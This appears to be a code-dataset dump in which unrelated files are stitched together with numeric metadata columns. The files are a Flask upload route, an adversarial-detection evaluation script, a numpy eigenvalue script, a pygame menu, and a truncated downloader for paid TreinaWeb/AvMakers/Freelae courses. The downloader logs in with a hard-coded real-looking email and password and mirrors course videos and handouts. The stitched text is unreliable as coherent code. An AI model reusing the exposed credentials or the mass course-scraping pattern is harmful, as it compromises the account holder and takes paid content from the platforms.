@app.route('/uploads/<filename>')
@csp_header()
def send_file(filename):
    """Serve a stored upload from the uploads directory.

    NOTE(review): this view shadows Flask's own ``send_file`` brought in by
    ``from flask import *``; only this module is affected. Delivery goes
    through ``send_from_directory``.
    """
    return send_from_directory(app.config["UPLOAD_DIRECTORY"], filename)
| 34.666667
| 145
| 0.687308
| 352
| 2,600
| 4.965909
| 0.380682
| 0.036041
| 0.080092
| 0.074371
| 0.239703
| 0.22254
| 0.168192
| 0.168192
| 0.168192
| 0.140732
| 0
| 0.003712
| 0.171154
| 2,600
| 74
| 146
| 35.135135
| 0.807425
| 0.169231
| 0
| 0.115385
| 0
| 0
| 0.246397
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096154
| false
| 0
| 0.115385
| 0.057692
| 0.384615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7577e2f7df5f804c676013417ab035ff063a393c
| 8,767
|
py
|
Python
|
test.py
|
AllenChen1998/RAD
|
9778e2576e427a26b2181561648f82162237a7dd
|
[
"MIT"
] | 1
|
2021-08-05T04:08:15.000Z
|
2021-08-05T04:08:15.000Z
|
test.py
|
AllenChen1998/RAD
|
9778e2576e427a26b2181561648f82162237a7dd
|
[
"MIT"
] | null | null | null |
test.py
|
AllenChen1998/RAD
|
9778e2576e427a26b2181561648f82162237a7dd
|
[
"MIT"
] | null | null | null |
import os
import cv2
import json
import time
import shutil
import argparse
import numpy as np
import PIL.Image
from copy import deepcopy
import mmcv
from mmdet.apis import init_detector, inference_detector, show_result
# install mmdet v1 in https://github.com/open-mmlab/mmdetection
# download corresponding pretrained models from https://mmdetection.readthedocs.io/en/latest/model_zoo.html
# Per-model mmdetection (v1) config files.
config_dir = 'configs'
config_files = {
    'ssd': config_dir + '/ssd512_coco.py',
    'faster_rcnn': config_dir + '/faster_rcnn_r101_fpn_1x.py',
    'mask_rcnn': config_dir + '/mask_rcnn_x101_64x4d_fpn_1x.py',
    'retinanet': config_dir + '/retinanet_r101_fpn_1x.py',
    'cascade_rcnn': config_dir + '/cascade_rcnn_r101_fpn_1x.py',
    'cascade_mask_rcnn': config_dir + '/cascade_mask_rcnn_x101_64x4d_fpn_1x.py',
    'htc': config_dir + '/htc/htc_x101_64x4d_fpn_20e_16gpu.py',
}
# Pristine copy: change_config() later replaces entries of config_files in place.
config_files_ori = deepcopy(config_files)
# Pretrained checkpoints matching the configs above (mmdetection model zoo).
checkpoint_dir = 'models'
checkpoint_files = {
    'ssd': checkpoint_dir + '/ssd512_coco_vgg16_caffe_120e_20181221-d48b0be8.pth',
    'faster_rcnn': checkpoint_dir + '/faster_rcnn_r101_fpn_2x_20181129-73e7ade7.pth',
    'mask_rcnn': checkpoint_dir + '/mask_rcnn_x101_64x4d_fpn_1x_20181218-cb159987.pth',
    'retinanet': checkpoint_dir + '/retinanet_r101_fpn_2x_20181129-72c14526.pth',
    'cascade_rcnn': checkpoint_dir + '/cascade_rcnn_r101_fpn_20e_20181129-b46dcede.pth',
    'cascade_mask_rcnn': checkpoint_dir + '/cascade_mask_rcnn_x101_64x4d_fpn_20e_20181218-630773a7.pth',
    'htc': checkpoint_dir + '/htc_x101_64x4d_fpn_20e_20190408-497f2561.pth',
}
# Canonical model ordering; both dicts must agree on it.
model_order = list(config_files.keys())
assert model_order == list(checkpoint_files.keys())
# Required external resources; fail fast at import time if anything is missing.
paths = {'Annot': 'COCO/annotations', 'mmdet': 'mmdetection/tools/test.py'}
for key in paths: assert os.path.exists(paths[key]), paths[key] + ' does not exist'
for key in config_files: assert os.path.exists(config_files[key]), config_files[key] + ' does not exist'
for key in checkpoint_files: assert os.path.exists(checkpoint_files[key]), checkpoint_files[key] + ' does not exist'
# Sub-directories under each experiment dir: adversarial samples ('adv'),
# resized annotations + rewritten configs ('cache'), metric outputs ('index'),
# visualized detections ('detection').
dirs = ['adv', 'cache', 'index', 'detection']
# Models that also produce segmentation masks (evaluated with an extra 'segm').
mask = ['mask_rcnn', 'cascade_mask_rcnn', 'htc']
def calculate_rmse(dir_name):
    """Print the mean per-sample RMSE between adversarial and original images.

    Walks *dir_name* for folders containing both 'sample_adv.png' and
    'sample_ori.png', resizes the original to the adversarial image's size,
    and averages the RMSE over samples whose RMSE is below 20.
    """
    collected = []
    for folder, _, filenames in os.walk(dir_name):
        if 'sample_adv.png' in filenames and 'sample_ori.png' in filenames:
            adv_img = np.array(PIL.Image.open(folder + '/sample_adv.png')).astype(np.float32)
            target_size = (adv_img.shape[1], adv_img.shape[0])
            ori_img = np.array(PIL.Image.open(folder + '/sample_ori.png').resize(target_size)).astype(np.float32)
            sample_rmse = np.sqrt(np.mean(np.square(adv_img - ori_img)))
            if sample_rmse < 20:
                collected.append(sample_rmse)
    # The +0.001 in the denominator avoids division by zero when no sample matched.
    print('RMSE is %.3f in %d samples' % (sum(collected) / (len(collected) + 0.001), len(collected)))
def re_annotation(dir_name):
    """Rewrite COCO val2017 annotations to match the resized adversarial
    samples in dir_name/adv and save them to
    dir_name/cache/instances_val2017_resized.json.

    Images are assumed resized so the longer side equals `size` (448 for
    MaskRCNN experiments, 416 otherwise) with aspect ratio preserved.
    """
    data = json.load(open(paths['Annot'] + '/instances_val2017.json', 'r', encoding='utf-8'))
    scales = {}  # image id -> resize factor applied to that image
    size = 416 if ('MaskRCNN' not in dir_name) else 448
    existing = [] # record the existing samples
    for file in os.listdir(dir_name + '/' + dirs[0]): existing.append(file)
    # record the resized scale for each sample
    abandoned = []  # indices of images with no generated adversarial sample
    for i in range(len(data['images'])):
        new_name = data['images'][i]['file_name'][:-4] + '.png'  # .jpg -> .png
        if new_name not in existing: abandoned.append(i)
        data['images'][i]['file_name'] = new_name
        ih, iw = data['images'][i]['height'], data['images'][i]['width']
        scale = min(size/ih, size/iw)
        data['images'][i]['height'], data['images'][i]['width'] = int(ih*scale), int(iw*scale)
        scales[data['images'][i]['id']] = scale
    # `index - i` compensates for the i elements already removed before this one.
    for i, index in enumerate(abandoned): data['images'].remove(data['images'][index-i])
    # resize the annotations for detection and segmentation
    abandoned = []
    for i in range(len(data['annotations'])):
        image_id = data['annotations'][i]['image_id']
        scale = scales[image_id]
        new_name = str(image_id).zfill(12) + '.png'
        if new_name not in existing: abandoned.append(i)
        # NOTE(review): RLE-encoded segmentations would raise TypeError, not
        # KeyError, and so would not be skipped here — confirm the annotations
        # only contain polygon lists.
        for j in range(len(data['annotations'][i]['segmentation'])):
            try:
                data['annotations'][i]['segmentation'][j] = list(np.array(data['annotations'][i]['segmentation'][j])*scale)
            except KeyError: continue
        # Area scales quadratically, bbox coordinates linearly.
        data['annotations'][i]['area'] = data['annotations'][i]['area'] * (scale ** 2)
        data['annotations'][i]['bbox'] = list(np.array(data['annotations'][i]['bbox']) * scale)
    for i, index in enumerate(abandoned): data['annotations'].remove(data['annotations'][index-i])
    result_dir = dir_name + '/' + dirs[1]
    os.makedirs(result_dir, exist_ok=True)
    json.dump(data, open(result_dir + '/instances_val2017_resized.json', 'w', encoding='utf-8'))
def change_config(model_name, dir_name):
    """Rewrite *model_name*'s mmdetection config so its validation set points
    at the adversarial samples and the resized annotation file, then register
    the rewritten config path in the global `config_files`.
    """
    global config_files, config_files_ori
    # change the config files to test the generated adversarial samples
    ori_config = config_files_ori[model_name]
    py_file = open(ori_config, 'r').read()
    # Plain textual substitution of the dataset paths inside the config source.
    py_file = py_file.replace("data_root + 'val2017/'", "'" + dir_name + "/" + dirs[0] + "'")
    py_file = py_file.replace("data_root + 'annotations/instances_val2017.json'", "'" + dir_name + "/" + dirs[1] + "/instances_val2017_resized.json'")
    new_config = dir_name + '/' + dirs[1] + '/' + os.path.basename(config_files_ori[model_name])
    with open(new_config, 'w') as f: f.write(py_file)
    config_files[model_name] = new_config
def test_index(model_name, dir_name, metric='bbox', unique_metric=False):
    """Evaluate *model_name* on the adversarial samples via mmdetection's
    test script (shelled out with os.system).

    metric: evaluation metric passed to the script; models in `mask` also get
    'segm' appended. unique_metric=True switches to the custom test_ours.py
    script and suppresses the extra 'segm'.
    """
    # test the performance of mmdetection models on adversarial samples
    # NOTE(review): mask_rcnn is skipped for MaskRCNN experiment dirs —
    # presumably white-box samples crafted against it; confirm.
    if 'MaskRCNN' in dir_name and model_name == 'mask_rcnn': return
    result_dir = dir_name + '/' + dirs[2]
    os.makedirs(result_dir, exist_ok=True)
    file_name = 'test.py' if not unique_metric else 'test_ours.py'
    command = 'python mmdetection/tools/%s %s %s --out %s --eval %s' % \
        (file_name, config_files[model_name], checkpoint_files[model_name], result_dir + '/' + model_name + '.pickle', metric if (model_name not in mask or unique_metric) else (metric + ' segm'))
    print(command)
    os.system(command)
def test_bbox(model_name, dir_name, sample_num):
    """Save bbox visualizations for the first *sample_num* adversarial
    samples to dir_name/detection/<model_name>/."""
    # generate visual results for sample_num samples
    source_dir = dir_name + '/' + dirs[0]
    result_dir = dir_name + '/' + dirs[3] + '/' + model_name
    os.makedirs(result_dir, exist_ok=True)
    config_file = config_files[model_name]
    checkpoint_file = checkpoint_files[model_name]
    model = init_detector(config_file, checkpoint_file, device='cuda:0')
    model_id, model_num = model_order.index(model_name) + 1, len(model_order)
    # Sort numerically by the file's (double-extension-stripped) stem.
    for i, file in enumerate(sorted(os.listdir(source_dir), key=lambda x: int(os.path.splitext(os.path.splitext(x)[0])[0]))):
        if i >= sample_num: break
        img = source_dir + '/' + file
        # NOTE(review): the bare except silently skips any failed sample —
        # including real errors, not just unreadable images.
        try:
            result = inference_detector(model, img)
            final = show_result(img, result, model.CLASSES, show=False)
        except: continue
        # [:, :, ::-1] reverses the channel axis (BGR <-> RGB) before saving.
        PIL.Image.fromarray(final[:, :, ::-1]).save(result_dir + '/' + os.path.splitext(file)[0] + '.png')
        print('[ Model %d/%d %s ] [ No %d/%d ] [ File %s ]' % (model_id, model_num, model_name, i+1, sample_num, file), end='\r')
def test_pipeline():
    """Full evaluation pipeline for one experiment dir: RMSE, annotation
    resizing, config rewriting, mAP/mAR indices, bbox visualizations and
    the custom accuracy/IoU metric."""
    parser = argparse.ArgumentParser(argument_default=argparse.SUPPRESS)
    parser.add_argument('dataset', type=str, help='dir name of the tested experiment')
    parser.add_argument('gpu_id', help='GPU(s) used')
    args, _ = parser.parse_known_args()
    os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_id
    assert os.path.exists(args.dataset)
    print('Calculating RMSE for', args.dataset, 'with', len(os.listdir(args.dataset + '/' + dirs[0])), 'samples...')
    calculate_rmse(args.dataset)
    re_annotation(dir_name=args.dataset) # resize annotations for existing adversarial samples to dir_name/dirs[1]/instances_val2017_resized.json
    # change paths in config file and saved in dir_name/dirs[1]/.py
    for model_name in config_files: change_config(model_name=model_name, dir_name=args.dataset)
    # run mAP, mAR for samples to dir_name/dirs[2]
    for model_name in config_files: test_index(model_name=model_name, dir_name=args.dataset)
    # get bbox detection result images in dir_name/dirs[3]/model_name
    for model_name in config_files: test_bbox(model_name=model_name, dir_name=args.dataset, sample_num=500)
    # run accuracy, IoU for samples to dir_name/dirs[2]
    for model_name in config_files: test_index(model_name=model_name, dir_name=args.dataset, unique_metric=True)
if __name__ == "__main__":
    test_pipeline()
| 50.97093
| 196
| 0.677883
| 1,253
| 8,767
| 4.509178
| 0.215483
| 0.046195
| 0.02531
| 0.019823
| 0.304248
| 0.200708
| 0.179292
| 0.100177
| 0.060177
| 0.047788
| 0
| 0.034827
| 0.17794
| 8,767
| 172
| 197
| 50.97093
| 0.749133
| 0.09878
| 0
| 0.068182
| 0
| 0.007576
| 0.218406
| 0.087622
| 0
| 0
| 0
| 0
| 0.037879
| 1
| 0.045455
| false
| 0
| 0.083333
| 0
| 0.128788
| 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
757912d9e4012e01b625eaf478b57827dc9d6ad6
| 415
|
py
|
Python
|
la/oblas/data/dgeev01.py
|
wtsia/gosl
|
8302f76dfe76d24ea5026b225bdad234383dacf9
|
[
"BSD-3-Clause"
] | 1,811
|
2015-05-21T12:47:27.000Z
|
2022-03-24T04:48:00.000Z
|
la/oblas/data/dgeev01.py
|
wtsia/gosl
|
8302f76dfe76d24ea5026b225bdad234383dacf9
|
[
"BSD-3-Clause"
] | 42
|
2016-09-29T05:23:28.000Z
|
2021-10-30T03:12:00.000Z
|
la/oblas/data/dgeev01.py
|
wtsia/gosl
|
8302f76dfe76d24ea5026b225bdad234383dacf9
|
[
"BSD-3-Clause"
] | 171
|
2015-07-14T07:50:35.000Z
|
2022-03-09T10:04:15.000Z
|
import numpy as np
import scipy.linalg as la
from auxiliary import *
# 4x4 test matrix used to generate dgeev (general eigenproblem) reference data.
# NOTE: np.matrix is deprecated in NumPy; kept here to avoid changing the
# type of `a` for any downstream consumer — la.eig accepts either.
a = np.matrix([
    [+0.35, +0.45, -0.14, -0.17],
    [+0.09, +0.07, -0.54, +0.35],
    [-0.44, -0.33, -0.03, +0.17],
    [+0.25, -0.32, -0.13, +0.11],
], dtype=float)
# Eigenvalues plus left and right eigenvectors, as computed by LAPACK dgeev.
w, vl, vr = la.eig(a, left=True, right=True)
vprintC('w', w)
# BUGFIX: bare `print` was a Python-2 statement; under Python 3 it is a
# no-op expression and the intended blank separator line never appeared.
print()
for i in range(4):
    vprintC('vl%d' % i, vl[:, i])  # i-th left eigenvector (column of vl)
print()
for i in range(4):
    vprintC('vr%d' % i, vr[:, i])  # i-th right eigenvector (column of vr)
| 18.043478
| 44
| 0.53253
| 86
| 415
| 2.569767
| 0.5
| 0.027149
| 0.036199
| 0.099548
| 0.217195
| 0.217195
| 0.217195
| 0
| 0
| 0
| 0
| 0.151515
| 0.204819
| 415
| 22
| 45
| 18.863636
| 0.518182
| 0
| 0
| 0.235294
| 0
| 0
| 0.021687
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.176471
| 0
| 0.176471
| 0.294118
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
757aed5f2d7b170e9c0c6e816158ab521912f796
| 9,969
|
py
|
Python
|
source/menus/menus.py
|
HugoPFe/Project-Asteroids
|
7a58ba00283216e83f02b2f58cf1944e9e217433
|
[
"MIT"
] | null | null | null |
source/menus/menus.py
|
HugoPFe/Project-Asteroids
|
7a58ba00283216e83f02b2f58cf1944e9e217433
|
[
"MIT"
] | 4
|
2021-06-20T21:32:53.000Z
|
2021-08-12T11:12:17.000Z
|
source/menus/menus.py
|
HugoPFe/Project-Asteroids
|
7a58ba00283216e83f02b2f58cf1944e9e217433
|
[
"MIT"
] | null | null | null |
import pygame
from pygame.locals import *
from util import *
from constants import FPS, VERSION, SCREEN_WIDTH, SCREEN_HEIGHT
from ui.button import *
from ui.font import *
from media.paths import bg, logo, body_font, title_font
class Main:
    def __init__(self):
        """Abstract base for all screens; each screen runs its own main loop.

        Subclasses override loop() (per-frame drawing) and check_events()
        (per-event handling) and call main_loop() to block until closed.
        """
        # Constants
        self.BACKGROUND = pygame.image.load(bg)
        # Variables
        self.screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
        self.screen_rect = self.screen.get_rect()
        self.clock = pygame.time.Clock()
        self.running = True
        self._buttons = []

    def main_loop(self):
        """Run _base_loop() until this screen's `running` flag goes False."""
        while self.running:
            self._base_loop()

    def _base_loop(self):
        """One frame: pump events, then draw background + screen content."""
        self.clock.tick(FPS)
        for event in pygame.event.get():
            if event.type == QUIT:  # Making sure that all screens stop running
                # NOTE(review): `sub` is a class, so this sets a CLASS
                # attribute named `running` that shadows the instance
                # property below — confirm this is the intended shutdown.
                for sub in Main.__subclasses__():
                    sub.running = False
            if event.type == KEYDOWN:
                if event.key == K_ESCAPE:
                    for sub in Main.__subclasses__():
                        sub.running = False
            # NOTE(review): leftover debug output — prints every event.
            print(event)
            self.check_events(event)
        self.screen.blit(self.BACKGROUND, (0, 0))
        self.loop()
        pygame.display.flip()

    def loop(self):
        """Per-frame drawing hook; overridden by subclasses."""
        pass

    def render_buttons(self):
        """ Draw all buttons on screen """
        for button in self._buttons:
            button.render()

    def add_buttons(self, *args):
        """Register buttons so render_buttons() draws them each frame."""
        for arg in args:
            self._buttons.append(arg)

    def check_events(self, event):
        """Per-event hook; overridden by subclasses."""
        pass

    @staticmethod
    def change_screen(next_screen, previous_screen=None, kill_prev=False):
        """Instantiate *next_screen*, optionally stopping *previous_screen*
        first and passing it to the new screen's constructor."""
        if kill_prev:
            previous_screen.running = False
        if previous_screen is not None:
            next_screen(previous_screen)
        else:
            next_screen()

    def back_screen(self):
        """Stop this screen's main loop (returns to the caller screen)."""
        self.running = False

    @property
    def running(self):
        return self._running

    @running.setter
    def running(self, arg):
        # Logs every state change for debugging screen transitions.
        self._running = arg
        print(f'[{self.__class__.__name__}]', f'running: {arg}')

    def back_mainmenu(self, screen):
        """ Returns directly to MainMenu by closing this screen and *screen*. """
        self.back_screen()
        screen.back_screen()
class MainMenu(Main):
    def __init__(self, game_cls):
        """Main menu screen: logo, play/controls/exit buttons, version tag.

        game_cls: the game screen class instantiated when 'Jogar' is pressed.
        """
        Main.__init__(self)
        self.logo = pygame.image.load(logo).convert_alpha()
        self.logo_rect = self.logo.get_rect(center=(SCREEN_WIDTH / 2, 150))
        # Buttons
        self.play_button = Button(screen=self.screen,
                                  x=120, y=SCREEN_HEIGHT - 220,
                                  width=90, height=40,
                                  text='Jogar',
                                  padding=5,
                                  command=lambda: self.change_screen(game_cls))
        self.controls_button = Button(screen=self.screen,
                                      x=120, y=SCREEN_HEIGHT - 160,
                                      width=90, height=40,
                                      text='Controles',
                                      padding=5,
                                      command=lambda: self.change_screen(ControlsMenu))
        self.exit_button = Button(screen=self.screen,
                                  x=120, y=SCREEN_HEIGHT - 100,
                                  width=90, height=40,
                                  text='Sair',
                                  padding=5,
                                  command=self.exit)
        self.add_buttons(
            self.play_button,
            self.controls_button,
            self.exit_button
        )
        # Version
        self.version_txt = Font(f'version: {VERSION}', (SCREEN_WIDTH - 10, SCREEN_HEIGHT - 30), 'right')
        self.version_txt.configure(font_name=body_font, size=15, color='white',
                                   bg_color='black', screen=self.screen)
        # Blocks here until the menu is closed.
        self.main_loop()

    def loop(self):
        # Per-frame drawing of logo, buttons and version text.
        self.screen.blit(self.logo, self.logo_rect)
        self.render_buttons()
        self.version_txt.render()

    def exit(self):
        # Stop this screen's main loop (quits the menu).
        self.running = False
class ControlsMenu(Main):
    def __init__(self):
        """Controls screen: a framed two-column list of actions and keys."""
        Main.__init__(self)
        self.screen_x = self.screen.get_width()
        self.screen_y = self.screen.get_height()
        self.screen_rect = self.screen.get_rect()
        # Action description -> key label shown in the frame (Portuguese UI).
        self.keys_fonts_text = {
            'up_font': {'command_text': 'Mover para cima', 'command_key': 'Seta para cima'},
            'down_font': {'command_text': 'Mover para baixo', 'command_key': 'Seta para baixo'},
            'left_font': {'command_text': 'Mover para esquerda', 'command_key': 'Seta para esquerda'},
            'right_font': {'command_text': 'Mover para direita', 'command_key': 'Seta para direita'},
            'clockwise_font': {'command_text': 'Girar em sentido horário', 'command_key': 'E'},
            'anticlockwise_font': {'command_text': 'Girar em sentido anti-horário', 'command_key': 'Q'},
            'shoot_font': {'command_text': 'Atirar', 'command_key': 'Espaço'},
            'pause_font': {'command_text': 'Pausar', 'command_key': 'P'}
        }
        self.control_font = None
        self.keys_fontgroup = None
        self.keys_frame()
        self.back_button = Button(screen=self.screen,
                                  x=SCREEN_WIDTH / 2,
                                  y=SCREEN_HEIGHT - 100,
                                  width=80, height=40,
                                  text='Voltar', padding=3,
                                  command=lambda: self.back_screen())
        self.add_buttons(self.back_button)
        # Blocks here until the screen is closed.
        self.main_loop()

    def loop(self):
        # Per-frame drawing: frame surface, buttons, title and key fonts.
        self.screen.blit(self.frame, self.frame_rect)
        self.render_buttons()
        self.control_txt.render()
        self.keys_fontgroup.render_fonts()

    def keys_frame(self):
        """Build the dark frame surface that hosts the controls list."""
        frame_color = '#353535'
        self.frame = pygame.Surface((int(self.screen_x * 0.9), int(self.screen_y * 0.5)))
        self.frame.fill(frame_color)
        self.frame_rect = self.frame.get_rect(center=self.screen_rect.center)
        self.frame_content(frame_color)

    def frame_content(self, frame_color):
        """Create the title font and the two-column description/key fonts."""
        # Title command_list
        self.control_txt = Font('Controles', pos=(self.frame_rect.centerx, 90))
        self.control_txt.configure(screen=self.screen,
                                   font_name=title_font,
                                   size=50,
                                   bold=True,
                                   antialias=True,
                                   color=(255, 255, 255),
                                   bg_color=(0, 0, 0),
                                   align='center')
        # Keys fonts
        font_space = 30  # vertical spacing between rows, in pixels
        self.keys_fontgroup = FontsGroup(screen=self.screen,
                                         font_name=body_font,
                                         size=18,
                                         bold=True,
                                         antialias=True,
                                         color=(255, 255, 255),
                                         bg_color=frame_color)
        keys_fonts_objects = []
        for commands, value in self.keys_fonts_text.items():  # Adding fonts to list
            # Left column: action description; right column: key label.
            keys_fonts_objects.append([Font(text=value['command_text'],
                                            pos=(self.frame_rect.x + 30, self.frame_rect.y)),
                                       Font(text=value['command_key'],
                                            pos=(self.frame_rect.right - 30, self.frame_rect.y),
                                            align='right')
                                       ])
        c = 1
        for command_font_list in keys_fonts_objects:  # Rendering on screen
            # Offset each description/key pair one row further down the frame.
            command_font_list[0].y += c * font_space
            command_font_list[1].y += c * font_space
            for i in range(2):
                self.keys_fontgroup.add_fonts(command_font_list[i])
            c += 1
class PauseScreen(Main):
    def __init__(self, game):
        """Pause overlay: continue/controls/main-menu buttons over the game.

        game: the running game screen, closed when returning to the main menu.
        """
        Main.__init__(self)
        self.paused_font = Font('Pausado', (self.screen_rect.centerx, 100), 'center')
        self.paused_font.configure(screen=self.screen, font_name=title_font, size=50, bold=True,
                                   antialias=True, color='white', bg_color='black')
        # Buttons
        self.continue_button = Button(screen=self.screen, x=self.screen_rect.centerx, y=400,
                                      width=110, height=40, text='Continuar',
                                      padding=10, command=self.back_screen)
        self.controls_button = Button(screen=self.screen, x=self.screen_rect.centerx, y=460,
                                      width=110, height=40, text='Controles',
                                      padding=8, command=lambda: self.change_screen(ControlsMenu))
        self.mainmenu_button = Button(screen=self.screen, x=self.screen_rect.centerx, y=520,
                                      width=110, height=40, text='Menu',
                                      padding=7, command=lambda: self.back_mainmenu(game))
        self.add_buttons(
            self.continue_button,
            self.controls_button,
            self.mainmenu_button
        )
        # Blocks here until the pause screen is dismissed.
        self.main_loop()

    def loop(self):
        self.paused_font.render()
        self.render_buttons()
        # NOTE(review): _base_loop() already calls pygame.display.flip()
        # after loop(); this extra flip double-presents each frame — confirm.
        pygame.display.flip()

    def check_events(self, event):
        # P (the pause key) also resumes the game.
        if event.type == KEYDOWN:
            if event.key == K_p:
                self.back_screen()
__all__ = ['Main', 'MainMenu', 'PauseScreen', 'ControlsMenu']
| 34.856643
| 104
| 0.51921
| 1,069
| 9,969
| 4.61927
| 0.199252
| 0.062778
| 0.035642
| 0.031187
| 0.346497
| 0.217699
| 0.200081
| 0.172742
| 0.133252
| 0.116646
| 0
| 0.021757
| 0.37757
| 9,969
| 285
| 105
| 34.978947
| 0.774053
| 0.035711
| 0
| 0.242574
| 0
| 0
| 0.073822
| 0.002827
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108911
| false
| 0.009901
| 0.034653
| 0.00495
| 0.168317
| 0.009901
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
757b44c079d1af1e49497f1e9f96873e80ae2cd3
| 15,155
|
py
|
Python
|
Cursos/treina_web.py
|
FranciscoAlveJr/Bot_Telegram
|
9960485a4a25648719ef6fafcb3b02c82db79253
|
[
"MIT"
] | null | null | null |
Cursos/treina_web.py
|
FranciscoAlveJr/Bot_Telegram
|
9960485a4a25648719ef6fafcb3b02c82db79253
|
[
"MIT"
] | null | null | null |
Cursos/treina_web.py
|
FranciscoAlveJr/Bot_Telegram
|
9960485a4a25648719ef6fafcb3b02c82db79253
|
[
"MIT"
] | null | null | null |
import requests
import json
import os
from bs4 import BeautifulSoup as bs
import random
import time
import base64
import m3u8
treinaweb_sessions = requests.Session()
class Downloader():
    """Interactive downloader for the TreinaWeb/AvMakers/Freelae platforms.

    Logs in with the module-level requests session, walks the course API and
    mirrors lessons to disk: HTML handouts, and mp4 videos reassembled from
    HLS (m3u8/key/ts) parts via aria2c + ffmpeg.

    SECURITY NOTE(review): account credentials are hard-coded in index();
    they belong in environment variables or a config file, not in source.
    The cleanup commands ('del', 'rmdir') are Windows-only.
    """

    def index(self):
        """Choose the platform, log in, then hand over to the main menu."""
        escolha = input('Qual plataforma voce deseja baixar?\n1 - TreinaWeb\n2 - AvMakers\n3 - Freelae\nResposta: ')
        n = [1, 2, 3]
        if escolha.isdigit():
            escolha = int(escolha)
            if escolha in n:
                if escolha == 1:
                    self.main = 'treinaweb'
                elif escolha == 2:
                    self.main = 'avmakers'
                elif escolha == 3:
                    self.main = 'freelae'
            else:
                print('Erro. Saindo.')
                exit(0)
        # NOTE(review): non-numeric input falls through without setting
        # self.main and crashes below — confirm intended validation.
        # Browser-like headers; {self.main} selects the platform domain.
        self.headers = {
            'authority': f'www.{self.main}.com.br',
            'pragma': 'no-cache',
            'cache-control': 'no-cache',
            'upgrade-insecure-requests': '1',
            'origin': f'https://www.{self.main}.com.br',
            'content-type': 'application/x-www-form-urlencoded',
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            'sec-fetch-site': 'same-origin',
            'sec-fetch-mode': 'navigate',
            'sec-fetch-user': '?1',
            'sec-fetch-dest': 'document',
            'referer': f'https://www.{self.main}.com.br/login',
            'accept-language': 'pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7',
        }
        # Prime the session with the login page's cookie.
        # NOTE(review): cookie_jar is currently unused (see commented lines).
        cookie_jar = treinaweb_sessions.get(f'https://www.{self.main}.com.br/login', headers=self.headers).cookies.get_dict()[f'{self.main}-site']
        #self.headers['cookie'] = f"treinaweb-site={cookie_jar}; path=/; secure; httponly; samesite=lax"
        #self.cookies = {"treinaweb-site": cookie_jar}
        # SECURITY: hard-coded credentials (see class docstring).
        user = 'ocoisa081@gmail.com'
        pswd = '18020301.pP'
        data = {
            'username': user,
            'password': pswd
        }
        treinaweb_sessions.post(f'https://www.{self.main}.com.br/login', headers=self.headers, data=data)
        # Fetch the student endpoint to obtain the authenticated session cookie.
        infos = treinaweb_sessions.get(f'https://www.{self.main}.com.br/api/painel/v1/aluno', headers=self.headers)
        self.headers['cookie'] = f"{self.main}-site={infos.cookies.get_dict()[f'{self.main}-site']}; path=/; secure; httponly; samesite=lax"
        #print(teste.headers)
        #
        self.quest()

    def quest(self):
        """Main menu: download courses, download formations, or show info."""
        escolha = input(f'Escolha uma das funções abaixo\n1 - Baixar Cursos\n2 - Baixar Formações\n3 - Informações\n4 - Sair\nResposta: ')
        n = [1, 2, 3]
        if escolha.isdigit():
            escolha = int(escolha)
            if escolha in n:
                if escolha == 1:
                    self.get_cursos()
                elif escolha == 2:
                    self.get_formacao()
                elif escolha == 3:
                    self.infos()
            else:
                print('Erro. Saindo.')
                exit(0)
        # NOTE(review): get_formacao()/infos() are not defined in this class
        # as shown — confirm they exist elsewhere or options 2/3 will crash.

    def get_cursos(self):
        """List the account's courses and download one (or all) of them."""
        #downloaded_read = json.loads(open('downloaded.json', 'r', encoding='utf-8').read())
        #downloaded_write = open('downloaded.json', 'w', encoding='utf-8')
        infos = treinaweb_sessions.get(f'https://www.{self.main}.com.br/api/painel/v1/cursos', headers=self.headers).json()
        # Category id -> name; fall back to a fixed map when the API response
        # has no category metadata (bare except keeps any failure silent).
        categorias = {}
        try:
            cats = infos['meta']['categorias']['data']
            for cat in cats:
                categorias[cat['id']] = cat['nome']
        except:
            categorias = {
                1: 'Freelae',
                2: 'Bonus',
                3: 'Bonus',
                4: 'Bonus',
            }
        cursos = infos['data']
        for index, curso in enumerate(cursos, start=1):
            categoria = curso['categorias']
            # Courses with several categories get one picked at random.
            if len(categoria) > 1:
                random_num = random.choice(categoria)
                self.categoria = categorias[random_num]
            else:
                self.categoria = categorias[categoria[0]]
            self.curso_nome = self.replacer(curso['nome'])
            print(f'{index} - {self.curso_nome}')
        print(f'{index+1} - Baixar todos')
        escolha = input('Qual curso vc quer baixar?\nR: ')
        if escolha.isdigit():
            escolha = int(escolha)
            if escolha < index + 1 :
                curso = cursos[escolha-1]
                self.get_course_here(curso)
            elif escolha == index + 1 :
                # "Baixar todos": re-derive category/name for every course.
